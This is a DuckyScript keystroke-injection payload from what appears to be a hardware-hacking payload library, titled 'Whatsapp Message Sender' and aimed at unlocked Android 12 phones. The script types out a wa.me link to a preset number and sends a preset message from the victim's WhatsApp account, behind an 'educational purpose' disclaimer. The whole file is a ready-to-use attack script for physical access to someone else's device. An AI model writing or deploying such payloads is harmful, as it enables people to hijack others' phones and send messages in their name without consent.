Path: blob/master/payloads/library/mobile/Android/WhatsappMessageSender/payload.txt
2971 views
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------1REM # TITLE: Whatsapp Message Sender2REM #3REM # AUTHOR: Gopalsamy Rajendran LinkedIn: @gopalsamyrajendran Version:1.04REM #5REM # Disclaimer: This script is only for Educational purpose. Please don't misuse it.6REM #7REM # Tested OS: Android version 128REM #9REM # Note: Script won't work on locked devices10REM #11REM # Date: 08/03/202312REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------1314DEFINE PHONENUMBER +91XXXXXXXXXX15DEFINE MESSAGE Hi this is Gopalsamy Rajendran1617REM #-------------------------------------------------18REM # Below lines will open search engine and type https://19DELAY 100020GUI r21DELAY 10022STRING h23DELAY 10024STRING t25DELAY 10026STRING t27DELAY 10028STRING p29DELAY 10030STRING s31DELAY 50032DELAY 10033STRING :34DELAY 10035STRING /36DELAY 10037STRING /38DELAY 10039REM #-------------------------------------------------4041REM #-------------------------------------------------42REM # Below lines will enter wa.me after https://43REM # Replace the mobile number with your's4445STRING wa.me/46STRING PHONENUMBER47ENTER48DELAY 500049REM #-------------------------------------------------5051REM #-------------------------------------------------52REM # Below message will be sent to the target number confiugured above53REM # Replace the message with your own message54STRING MESSAGE55TAB56TAB57ENTER58DELAY 100059REM #-------------------------------------------------60616263